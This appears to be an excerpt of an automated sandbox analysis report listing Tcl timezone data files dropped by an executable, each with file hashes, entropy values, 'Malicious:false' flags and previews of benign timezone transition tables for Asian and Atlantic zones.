                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tokyo) {.. {-9223372036854775808 33539 0 LMT}.. {-2587712400 32400 0 JST}.. {-683802000 36000 1 JDT}.. {-672310800 32400 0 JST}.. {-654771600 36000 1 JDT}.. {-640861200 32400 0 JST}.. {-620298000 36000 1 JDT}.. {-609411600 32400 0 JST}.. {-588848400 36000 1 JDT}.. {-577962000 32400 0 JST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2116
                                                                                                                                                                                                                              Entropy (8bit):3.695316005718174
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5CeLz/XJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFEno:5H040yVRB7VfXucydm4IqtTTDOS
                                                                                                                                                                                                                              MD5:E95DE93CBCE72C5E02D7ECFE94C96308
                                                                                                                                                                                                                              SHA1:59A49EBFE544D97545BADFEFE716BB5659C64C20
                                                                                                                                                                                                                              SHA-256:6B64A01D0F0B5EC7A1410C3BD6883BA7CC133E9F073D40E8BFECE037E3A3FA24
                                                                                                                                                                                                                              SHA-512:9E33DC9C1C6D60F3226263C484AF46A14AAB31F838516A0D69BA08F8F416EF10D09697E8D7ABAC1CE1F5BCE8AB0C2635D99FBE70C89ECC268DED0DCE89E67466
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Tomsk) {.. {-9223372036854775808 20391 0 LMT}.. {-1578807591 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {7647084
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.897140749162557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8pYFfXHAIgNzGRRL/2WFKPQOrFJ4WFKov:SlSWB9vsM3yWFPHAIg0RN/2wKPQOrFJD
                                                                                                                                                                                                                              MD5:F6AE33D706C36FDD8A21F44AD59F5607
                                                                                                                                                                                                                              SHA1:94D6EC7A437249AEBE2FA4AF8AFB029A620368C0
                                                                                                                                                                                                                              SHA-256:732751845ACEDBFFD3C6170F4B94CB20B25BFDCFCC5EEA19F4BE439F5C5B573A
                                                                                                                                                                                                                              SHA-512:2314AB2B154887842211C9A570BC1323D9B4375FF60C96296835DB001E8A277CA62D40B8562BC34EDDF281D96D5325640B79F7907558C6E0319C7D2A76BE239C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Makassar)]} {.. LoadTimeZoneFile Asia/Makassar..}..set TZData(:Asia/Ujung_Pandang) $TZData(:Asia/Makassar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1590
                                                                                                                                                                                                                              Entropy (8bit):3.7728141273024374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IerIvusF7cCGK6zoCjZte3kzMjsBw0oZzlL98oysHqGzJvqE+ksabzdX+YjL:5VujmUCei46oljFC67
                                                                                                                                                                                                                              MD5:A4647294401D2B54ABAA8E509BF05A6F
                                                                                                                                                                                                                              SHA1:BF804CC38996D7715E3BA9BAD715D7ADBED781B9
                                                                                                                                                                                                                              SHA-256:A56A26981163A717CF388A423CFE7A2BAD1BE8652BE2E338670CBC0C0A70E5E9
                                                                                                                                                                                                                              SHA-512:B43157FABDE016FA6636CAB7B06CC1DEA53526B42FB46BB41DC4B7E48188D191C325BEF0D170B125E885F321C4316746A8D478D798828E2DC4A51C71DA4A610C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ulaanbaatar) {.. {-9223372036854775808 25652 0 LMT}.. {-2032931252 25200 0 +07}.. {252435600 28800 0 +08}.. {417974400 32400 1 +08}.. {433782000 28800 0 +08}.. {449596800 32400 1 +08}.. {465318000 28800 0 +08}.. {481046400 32400 1 +08}.. {496767600 28800 0 +08}.. {512496000 32400 1 +08}.. {528217200 28800 0 +08}.. {543945600 32400 1 +08}.. {559666800 28800 0 +08}.. {575395200 32400 1 +08}.. {591116400 28800 0 +08}.. {606844800 32400 1 +08}.. {622566000 28800 0 +08}.. {638294400 32400 1 +08}.. {654620400 28800 0 +08}.. {670348800 32400 1 +08}.. {686070000 28800 0 +08}.. {701798400 32400 1 +08}.. {717519600 28800 0 +08}.. {733248000 32400 1 +08}.. {748969200 28800 0 +08}.. {764697600 32400 1 +08}.. {780418800 28800 0 +08}.. {796147200 32400 1 +08}.. {811868400 28800 0 +08}.. {828201600 32400 1 +08}.. {843922800 28800 0 +08}.. {859
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.728285544456033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8TcXkXHAIgNrfcXORL/2WFKhrMEBQWFKucXB:SlSWB9vsM3yXHAIgTN/2wKhrMEewKX
                                                                                                                                                                                                                              MD5:D2EAEA6182FB332CAA707B523F6C8A9D
                                                                                                                                                                                                                              SHA1:3BFC654E2B3BCF902AF41AEEC46772C84FFF3890
                                                                                                                                                                                                                              SHA-256:D17FDAF17B3DAC3A1310E2332F61585598185E64CED799ABD68249EB5B698591
                                                                                                                                                                                                                              SHA-512:E16BEE28BFE3AFFFE6F0025C09D0D65001F38D5045AAB1B554E4D3A66A88273F985B7BAA11F8D26E76E5ABC9F559E3E4B794CC939AAD5FF012A5A47924D08CB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ulaanbaatar)]} {.. LoadTimeZoneFile Asia/Ulaanbaatar..}..set TZData(:Asia/Ulan_Bator) $TZData(:Asia/Ulaanbaatar)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                              MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                              SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
                                                                                                                                                                                                                              SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                              SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                              MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                              SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                              SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                              SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                              MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                              SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                              SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                              SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                              MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                              SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                              SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                              SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                              MD5:E43E5F0EA7C4575525BAB130984DCDCC
                                                                                                                                                                                                                              SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                              SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                              SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                              MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                              SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                              SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                              SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2095
                                                                                                                                                                                                                              Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                              MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                              SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                              SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                              SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                              MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                              SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                              SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                              SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9879
                                                                                                                                                                                                                              Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                              SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                              SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                              SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                              MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                              SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                              SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                              SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                                                                              Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                              SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                              SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                              SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
